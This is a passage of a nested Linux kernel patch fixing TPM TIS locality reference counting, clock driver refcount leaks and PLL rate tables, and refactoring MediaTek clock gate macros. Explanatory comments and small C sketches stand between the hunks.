+ 		ret = tpm1_getcap(chip, TPM_CAP_PROP_TIS_TIMEOUT, &cap, desc, 0);
+-
+-	release_locality(chip, 0);
+-
+-	return ret;
+ }
+ 
+ /* Register the IRQ and issue a command that will cause an interrupt. If an
+@@ -773,52 +790,55 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	}
+ 	priv->irq = irq;
+ 
++	rc = tpm_tis_request_locality(chip, 0);
++	if (rc < 0)
++		return rc;
++
+ 	rc = tpm_tis_read8(priv, TPM_INT_VECTOR(priv->locality),
+ 			   &original_int_vec);
+-	if (rc < 0)
++	if (rc < 0) {
++		tpm_tis_relinquish_locality(chip, priv->locality);
+ 		return rc;
++	}
+ 
+ 	rc = tpm_tis_write8(priv, TPM_INT_VECTOR(priv->locality), irq);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	rc = tpm_tis_read32(priv, TPM_INT_STATUS(priv->locality), &int_status);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	/* Clear all existing */
+ 	rc = tpm_tis_write32(priv, TPM_INT_STATUS(priv->locality), int_status);
+ 	if (rc < 0)
+-		return rc;
+-
++		goto restore_irqs;
+ 	/* Turn on */
+ 	rc = tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality),
+ 			     intmask | TPM_GLOBAL_INT_ENABLE);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	priv->irq_tested = false;
+ 
+ 	/* Generate an interrupt by having the core call through to
+ 	 * tpm_tis_send
+ 	 */
+-	rc = tpm_tis_gen_interrupt(chip);
+-	if (rc < 0)
+-		return rc;
++	tpm_tis_gen_interrupt(chip);
+ 
++restore_irqs:
+ 	/* tpm_tis_send will either confirm the interrupt is working or it
+ 	 * will call disable_irq which undoes all of the above.
+ 	 */
+ 	if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-		rc = tpm_tis_write8(priv, original_int_vec,
+-				TPM_INT_VECTOR(priv->locality));
+-		if (rc < 0)
+-			return rc;
+-
+-		return 1;
++		tpm_tis_write8(priv, original_int_vec,
++			       TPM_INT_VECTOR(priv->locality));
++		rc = -1;
+ 	}
+ 
+-	return 0;
++	tpm_tis_relinquish_locality(chip, priv->locality);
++
++	return rc;
+ }
+ 
+ /* Try to find the IRQ the TPM is using. This is for legacy x86 systems that
+@@ -932,8 +952,8 @@ static const struct tpm_class_ops tpm_tis = {
+ 	.req_complete_mask = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_complete_val = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_canceled = tpm_tis_req_canceled,
+-	.request_locality = request_locality,
+-	.relinquish_locality = release_locality,
++	.request_locality = tpm_tis_request_locality,
++	.relinquish_locality = tpm_tis_relinquish_locality,
+ 	.clk_enable = tpm_tis_clkrun_enable,
+ };
+ 
+@@ -967,6 +987,8 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 	priv->timeout_min = TPM_TIMEOUT_USECS_MIN;
+ 	priv->timeout_max = TPM_TIMEOUT_USECS_MAX;
+ 	priv->phy_ops = phy_ops;
++	priv->locality_count = 0;
++	mutex_init(&priv->locality_count_mutex);
+ 
+ 	dev_set_drvdata(&chip->dev, priv);
+ 
+@@ -1013,14 +1035,14 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		   TPM_INTF_DATA_AVAIL_INT | TPM_INTF_STS_VALID_INT;
+ 	intmask &= ~TPM_GLOBAL_INT_ENABLE;
+ 
+-	rc = request_locality(chip, 0);
++	rc = tpm_tis_request_locality(chip, 0);
+ 	if (rc < 0) {
+ 		rc = -ENODEV;
+ 		goto out_err;
+ 	}
+ 
+ 	tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+-	release_locality(chip, 0);
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+ 	rc = tpm_chip_start(chip);
+ 	if (rc)
+@@ -1080,13 +1102,13 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		 * proper timeouts for the driver.
+ 		 */
+ 
+-		rc = request_locality(chip, 0);
++		rc = tpm_tis_request_locality(chip, 0);
+ 		if (rc < 0)
+ 			goto out_err;
+ 
+ 		rc = tpm_get_timeouts(chip);
+ 
+-		release_locality(chip, 0);
++		tpm_tis_relinquish_locality(chip, 0);
+ 
+ 		if (rc) {
+ 			dev_err(dev, "Could not get TPM timeouts and durations\n");
+@@ -1094,17 +1116,21 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 			goto out_err;
+ 		}
+ 
+-		if (irq) {
++		if (irq)
+ 			tpm_tis_probe_irq_single(chip, intmask, IRQF_SHARED,
+ 						 irq);
+-			if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-				dev_err(&chip->dev, FW_BUG
++		else
++			tpm_tis_probe_irq(chip, intmask);
++
++		if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
++			dev_err(&chip->dev, FW_BUG
+ 					"TPM interrupt not working, polling instead\n");
+ 
+-				disable_interrupts(chip);
+-			}
+-		} else {
+-			tpm_tis_probe_irq(chip, intmask);
++			rc = tpm_tis_request_locality(chip, 0);
++			if (rc < 0)
++				goto out_err;
++			disable_interrupts(chip);
++			tpm_tis_relinquish_locality(chip, 0);
+ 		}
+ 	}
+ 
+@@ -1165,28 +1191,27 @@ int tpm_tis_resume(struct device *dev)
+ 	struct tpm_chip *chip = dev_get_drvdata(dev);
+ 	int ret;
+ 
++	ret = tpm_tis_request_locality(chip, 0);
++	if (ret < 0)
++		return ret;
++
+ 	if (chip->flags & TPM_CHIP_FLAG_IRQ)
+ 		tpm_tis_reenable_interrupts(chip);
+ 
+ 	ret = tpm_pm_resume(dev);
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+ 	/*
+ 	 * TPM 1.2 requires self-test on resume. This function actually returns
+ 	 * an error code but for unknown reason it isn't handled.
+ 	 */
+-	if (!(chip->flags & TPM_CHIP_FLAG_TPM2)) {
+-		ret = request_locality(chip, 0);
+-		if (ret < 0)
+-			return ret;
+-
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+ 		tpm1_do_selftest(chip);
++out:
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+-		release_locality(chip, 0);
+-	}
+-
+-	return 0;
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(tpm_tis_resume);
+ #endif
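The tpm_tis_core.c diff converts the raw request/release pair into reference-counted tpm_tis_request_locality()/tpm_tis_relinquish_locality(), so nested users share one hardware claim: the IRQ probe path now holds the locality across its TPM_INT_* register writes (unwinding through the new restore_irqs label), and resume holds it across interrupt re-enable and the TPM 1.2 self-test. A user-space sketch of the counting discipline, assuming pthreads in place of the kernel mutex and stub register accessors:

	#include <pthread.h>

	static pthread_mutex_t locality_lock = PTHREAD_MUTEX_INITIALIZER;
	static unsigned int locality_count;

	static int hw_request(int l)     { (void)l; return 0; }	/* would write TPM_ACCESS(l) */
	static void hw_relinquish(int l) { (void)l; }		/* would write ACTIVE_LOCALITY */

	static int request_locality(int l)
	{
		int ret = 0;

		pthread_mutex_lock(&locality_lock);
		if (locality_count == 0)
			ret = hw_request(l);	/* only the first user touches the TPM */
		if (ret == 0)
			locality_count++;
		pthread_mutex_unlock(&locality_lock);
		return ret;
	}

	static void relinquish_locality(int l)
	{
		pthread_mutex_lock(&locality_lock);
		if (--locality_count == 0)
			hw_relinquish(l);	/* only the last user gives it back */
		pthread_mutex_unlock(&locality_lock);
	}

	int main(void)
	{
		request_locality(0);
		request_locality(0);	/* nested user: no second hardware claim */
		relinquish_locality(0);
		relinquish_locality(0);	/* hardware released only here */
		return 0;
	}
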
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index b68479e0de10f..1d51d5168fb6e 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -91,6 +91,8 @@ enum tpm_tis_flags {
+ 
+ struct tpm_tis_data {
+ 	u16 manufacturer_id;
++	struct mutex locality_count_mutex;
++	unsigned int locality_count;
+ 	int locality;
+ 	int irq;
+ 	bool irq_tested;
+diff --git a/drivers/clk/at91/clk-sam9x60-pll.c b/drivers/clk/at91/clk-sam9x60-pll.c
+index d757003004cbb..0882ed01d5c27 100644
+--- a/drivers/clk/at91/clk-sam9x60-pll.c
++++ b/drivers/clk/at91/clk-sam9x60-pll.c
+@@ -668,7 +668,7 @@ sam9x60_clk_register_frac_pll(struct regmap *regmap, spinlock_t *lock,
+ 
+ 		ret = sam9x60_frac_pll_compute_mul_frac(&frac->core, FCORE_MIN,
+ 							parent_rate, true);
+-		if (ret <= 0) {
++		if (ret < 0) {
+ 			hw = ERR_PTR(ret);
+ 			goto free;
+ 		}
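The one-character sam9x60 change matters because of how the kernel encodes errors in pointers: ERR_PTR(0) is simply NULL, which IS_ERR() does not flag, so routing a legitimate zero return through the error path would hand callers a NULL hw pointer. A self-contained sketch with the ERR_PTR()/IS_ERR() definitions inlined in simplified form:

	#include <stdio.h>

	#define MAX_ERRNO	4095
	#define ERR_PTR(err)	((void *)(long)(err))
	#define IS_ERR(ptr)	((unsigned long)(ptr) >= (unsigned long)-MAX_ERRNO)

	int main(void)
	{
		void *ok  = ERR_PTR(0);		/* == NULL, not an error pointer */
		void *bad = ERR_PTR(-12);	/* -ENOMEM */

		printf("ERR_PTR(0):   IS_ERR=%d\n", (int)IS_ERR(ok));	/* prints 0 */
		printf("ERR_PTR(-12): IS_ERR=%d\n", (int)IS_ERR(bad));	/* prints 1 */
		return 0;
	}
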
+diff --git a/drivers/clk/clk-conf.c b/drivers/clk/clk-conf.c
+index 2ef819606c417..1a4e6340f95ce 100644
+--- a/drivers/clk/clk-conf.c
++++ b/drivers/clk/clk-conf.c
+@@ -33,9 +33,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 			else
+ 				return rc;
+ 		}
+-		if (clkspec.np == node && !clk_supplier)
++		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			return 0;
++		}
+ 		pclk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(pclk)) {
+ 			if (PTR_ERR(pclk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get parent clock %d for %pOF\n",
+@@ -48,10 +51,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 		if (rc < 0)
+ 			goto err;
+ 		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			rc = 0;
+ 			goto err;
+ 		}
+ 		clk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(clk)) {
+ 			if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get assigned clock %d for %pOF\n",
+@@ -93,10 +98,13 @@ static int __set_clk_rates(struct device_node *node, bool clk_supplier)
+ 				else
+ 					return rc;
+ 			}
+-			if (clkspec.np == node && !clk_supplier)
++			if (clkspec.np == node && !clk_supplier) {
++				of_node_put(clkspec.np);
+ 				return 0;
++			}
+ 
+ 			clk = of_clk_get_from_provider(&clkspec);
++			of_node_put(clkspec.np);
+ 			if (IS_ERR(clk)) {
+ 				if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 					pr_warn("clk: couldn't get clock %d for %pOF\n",
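All three clk-conf.c hunks plug the same leak: of_parse_phandle_with_args() returns clkspec.np with its refcount raised, and every path that is done with the node, the early success return included, must drop that reference. A minimal sketch of the get/put discipline with stand-in types; node_get()/node_put() here are illustrative, not the OF API:

	#include <stdio.h>

	struct node { int refcount; };

	static void node_get(struct node *n) { n->refcount++; }
	static void node_put(struct node *n) { n->refcount--; }

	/* stand-in for of_parse_phandle_with_args(): takes a reference on success */
	static int parse(struct node *n) { node_get(n); return 0; }

	static int set_clk(struct node *n, int early_exit)
	{
		if (parse(n))
			return -1;	/* failed parse: no reference to drop */
		if (early_exit) {
			node_put(n);	/* the put these hunks add */
			return 0;
		}
		/* ... of_clk_get_from_provider(&clkspec) ... */
		node_put(n);		/* done with the node either way */
		return 0;
	}

	int main(void)
	{
		struct node n = { 0 };

		set_clk(&n, 1);
		set_clk(&n, 0);
		printf("refcount=%d\n", n.refcount);	/* 0: balanced */
		return 0;
	}
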
+diff --git a/drivers/clk/imx/clk-fracn-gppll.c b/drivers/clk/imx/clk-fracn-gppll.c
+index a2aaa14fc1aef..f6674110a88e0 100644
+--- a/drivers/clk/imx/clk-fracn-gppll.c
++++ b/drivers/clk/imx/clk-fracn-gppll.c
+@@ -15,6 +15,7 @@
+ #include "clk.h"
+ 
+ #define PLL_CTRL		0x0
++#define HW_CTRL_SEL		BIT(16)
+ #define CLKMUX_BYPASS		BIT(2)
+ #define CLKMUX_EN		BIT(1)
+ #define POWERUP_MASK		BIT(0)
+@@ -60,18 +61,20 @@ struct clk_fracn_gppll {
+ };
+ 
+ /*
+- * Fvco = Fref * (MFI + MFN / MFD)
+- * Fout = Fvco / (rdiv * odiv)
++ * Fvco = (Fref / rdiv) * (MFI + MFN / MFD)
++ * Fout = Fvco / odiv
++ * The (Fref / rdiv) should be in the range 20 MHz to 40 MHz
++ * The Fvco should be in the range 2.5 GHz to 5 GHz
+  */
+ static const struct imx_fracn_gppll_rate_table fracn_tbl[] = {
+-	PLL_FRACN_GP(650000000U, 81, 0, 1, 0, 3),
++	PLL_FRACN_GP(650000000U, 162, 50, 100, 0, 6),
+ 	PLL_FRACN_GP(594000000U, 198, 0, 1, 0, 8),
+-	PLL_FRACN_GP(560000000U, 70, 0, 1, 0, 3),
+-	PLL_FRACN_GP(498000000U, 83, 0, 1, 0, 4),
++	PLL_FRACN_GP(560000000U, 140, 0, 1, 0, 6),
++	PLL_FRACN_GP(498000000U, 166, 0, 1, 0, 8),
+ 	PLL_FRACN_GP(484000000U, 121, 0, 1, 0, 6),
+ 	PLL_FRACN_GP(445333333U, 167, 0, 1, 0, 9),
+-	PLL_FRACN_GP(400000000U, 50, 0, 1, 0, 3),
+-	PLL_FRACN_GP(393216000U, 81, 92, 100, 0, 5)
++	PLL_FRACN_GP(400000000U, 200, 0, 1, 0, 12),
++	PLL_FRACN_GP(393216000U, 163, 84, 100, 0, 10)
+ };
+ 
+ struct imx_fracn_gppll_clk imx_fracn_gppll = {
+@@ -191,6 +194,11 @@ static int clk_fracn_gppll_set_rate(struct clk_hw *hw, unsigned long drate,
+ 
+ 	rate = imx_get_pll_settings(pll, drate);
+ 
++	/* Hardware control select disable. PLL is controlled by register */
++	tmp = readl_relaxed(pll->base + PLL_CTRL);
++	tmp &= ~HW_CTRL_SEL;
++	writel_relaxed(tmp, pll->base + PLL_CTRL);
++
+ 	/* Disable output */
+ 	tmp = readl_relaxed(pll->base + PLL_CTRL);
+ 	tmp &= ~CLKMUX_EN;
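The rewritten rate table can be checked against the new comment. Assuming the usual 24 MHz reference oscillator and rdiv == 0 meaning divide-by-one (both assumptions here, not stated in the hunk), the new 650 MHz entry works out as:

	Fvco = (24 MHz / 1) * (162 + 50/100) = 24 MHz * 162.5 = 3900 MHz
	Fout = 3900 MHz / 6 = 650 MHz

3900 MHz sits inside the 2.5-5 GHz VCO window and 24 MHz inside the 20-40 MHz post-rdiv window, whereas the old entry (MFI 81, odiv 3) put Fvco at only 24 * 81 = 1944 MHz, below the 2.5 GHz floor; that is why every row was rescaled. The other new rows check out the same way, e.g. 24 * 200 / 12 = 400 MHz.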
+diff --git a/drivers/clk/imx/clk-imx8ulp.c b/drivers/clk/imx/clk-imx8ulp.c
+index 8eb1af2d64298..ca0e4a3aa454e 100644
+--- a/drivers/clk/imx/clk-imx8ulp.c
++++ b/drivers/clk/imx/clk-imx8ulp.c
+@@ -200,8 +200,8 @@ static int imx8ulp_clk_cgc1_init(struct platform_device *pdev)
+ 	clks[IMX8ULP_CLK_NIC_AD_DIVPLAT] = imx_clk_hw_divider_flags("nic_ad_divplat", "nic_sel", base + 0x34, 21, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_NIC_PER_DIVPLAT] = imx_clk_hw_divider_flags("nic_per_divplat", "nic_ad_divplat", base + 0x34, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_XBAR_AD_DIVPLAT] = imx_clk_hw_divider_flags("xbar_ad_divplat", "nic_ad_divplat", base + 0x38, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "nic_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "nic_ad_divplat", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "xbar_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "xbar_divbus", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 
+ 	clks[IMX8ULP_CLK_SOSC_DIV1_GATE] = imx_clk_hw_gate_dis("sosc_div1_gate", "sosc", base + 0x108, 7);
+ 	clks[IMX8ULP_CLK_SOSC_DIV2_GATE] = imx_clk_hw_gate_dis("sosc_div2_gate", "sosc", base + 0x108, 15);
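The imx8ulp hunk reparents two dividers so the XBAR clocks form the cascade the patch implies:

	nic_ad_divplat -> xbar_ad_divplat -> xbar_divbus -> xbar_ad_slow

Each arrow is a divider stage, so xbar_ad_slow now runs at the nic_ad rate divided by all three settings in sequence rather than each divider being applied independently to nic_ad_divplat, which corrects the rates the clk framework computes for the bus clocks.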
+diff --git a/drivers/clk/mediatek/clk-mt2701-aud.c b/drivers/clk/mediatek/clk-mt2701-aud.c
+index 6ba398eb7df91..4287bd3f545ee 100644
+--- a/drivers/clk/mediatek/clk-mt2701-aud.c
++++ b/drivers/clk/mediatek/clk-mt2701-aud.c
+@@ -15,41 +15,17 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
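Every open-coded GATE_* macro in the MediaTek hunks that follow collapses into the shared GATE_MTK()/GATE_MTK_FLAGS() helpers from the common clk-gate header, so each clock driver names only what actually varies: the register block, the bit shift, and the ops. In rough form (a sketch of the common helper, so treat the exact field layout as illustrative):

	#define GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift, _ops, _flags) { \
			.id = _id,						\
			.name = _name,						\
			.parent_name = _parent,					\
			.regs = _regs,						\
			.shift = _shift,					\
			.ops = _ops,						\
			.flags = _flags,					\
		}

	#define GATE_MTK(_id, _name, _parent, _regs, _shift, _ops)		\
		GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift, _ops, 0)

The conversions are behavior-neutral: expanding GATE_MTK() with a given regs pointer and ops reproduces the initializer each file used to spell out by hand.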
+diff --git a/drivers/clk/mediatek/clk-mt2701-bdp.c b/drivers/clk/mediatek/clk-mt2701-bdp.c
+index 435ed4819d563..b0f0572079452 100644
+--- a/drivers/clk/mediatek/clk-mt2701-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2701-bdp.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs bdp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_BDP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_BDP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP0(CLK_BDP_BRG_BA, "brg_baclk", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-eth.c b/drivers/clk/mediatek/clk-mt2701-eth.c
+index edf1e2ed2b596..601358748750e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-eth.c
++++ b/drivers/clk/mediatek/clk-mt2701-eth.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] = {
+ 	GATE_ETH(CLK_ETHSYS_HSDMA, "hsdma_clk", "ethif_sel", 5),
+diff --git a/drivers/clk/mediatek/clk-mt2701-g3d.c b/drivers/clk/mediatek/clk-mt2701-g3d.c
+index 1458109d99d94..8d1fc8e3336eb 100644
+--- a/drivers/clk/mediatek/clk-mt2701-g3d.c
++++ b/drivers/clk/mediatek/clk-mt2701-g3d.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_G3D(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &g3d_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_G3D(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &g3d_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate_regs g3d_cg_regs = {
+ 	.sta_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt2701-hif.c b/drivers/clk/mediatek/clk-mt2701-hif.c
+index 434cbbe8c0371..edeeb033a2350 100644
+--- a/drivers/clk/mediatek/clk-mt2701-hif.c
++++ b/drivers/clk/mediatek/clk-mt2701-hif.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs hif_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_HIF(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &hif_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_HIF(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &hif_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate hif_clks[] = {
+ 	GATE_HIF(CLK_HIFSYS_USB0PHY, "usb0_phy_clk", "ethpll_500m_ck", 21),
+diff --git a/drivers/clk/mediatek/clk-mt2701-img.c b/drivers/clk/mediatek/clk-mt2701-img.c
+index 7e53deb7f9905..eb172473f0755 100644
+--- a/drivers/clk/mediatek/clk-mt2701-img.c
++++ b/drivers/clk/mediatek/clk-mt2701-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_COMM, "img_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-mm.c b/drivers/clk/mediatek/clk-mt2701-mm.c
+index 9ea7abad99d23..eb069f3bc9a2b 100644
+--- a/drivers/clk/mediatek/clk-mt2701-mm.c
++++ b/drivers/clk/mediatek/clk-mt2701-mm.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs disp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_DISP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_DISP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_DISP0(CLK_MM_SMI_COMMON, "mm_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-vdec.c b/drivers/clk/mediatek/clk-mt2701-vdec.c
+index d3089da0ab62e..0f07c5d731df6 100644
+--- a/drivers/clk/mediatek/clk-mt2701-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2701-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKGEN, "vdec_cken", "vdec_sel", 0),
